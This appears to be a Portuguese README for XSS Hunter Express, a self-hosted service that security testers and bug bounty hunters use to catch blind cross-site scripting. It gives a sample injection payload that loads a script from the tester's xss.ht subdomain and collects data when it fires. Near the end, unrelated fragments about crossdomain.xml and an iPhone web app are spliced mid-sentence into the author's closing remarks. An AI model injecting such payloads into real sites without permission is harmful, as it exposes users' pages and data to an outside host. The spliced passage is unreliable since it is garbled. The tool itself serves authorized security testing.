
O serviço XSS Hunter - uma versão portátil do XSSHunter.com
Veja aqui para mais informações: https://github.com/mandatoryprogrammer/xsshunter-express
Esta é uma versão portátil do código fonte rodando em https://xsshunter.com. É projetada para ser facilmente instalável em qualquer servidor para profissionais de segurança e caçadores de recompensas por bugs que desejam testar XSS de uma maneira muito mais poderosa.
Se você não quiser configurar este software e preferir apenas começar a testar, veja https://xsshunter.com .
Por favor, veja https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ para informações sobre como configurar o XSS Hunter em seu próprio servidor.
Ao se inscrever, você criará um domínio curto especial como yoursubdomain.xss.ht que identifica suas vulnerabilidades XSS e hospeda seu payload. Você então usa este subdomínio em seus testes de XSS, usando tentativas de injeção como "><script src=//yoursubdomain.xss.ht></script>. O XSS Hunter servirá automaticamente as sondas XSS e coletará as informações resultantes quando elas dispararem.
crossdomain.xml inadequadas em sistemas internos que normalmente não poderiam ser acessados./app e salvar a página como um aplicativo web na área de trabalho do seu iPhone.Todo o código foi criado por mim e (por esse motivo) provavelmente não é a melhor prática e definitivamente precisa de otimização/limpeza. Quaisquer pull requests são apreciados!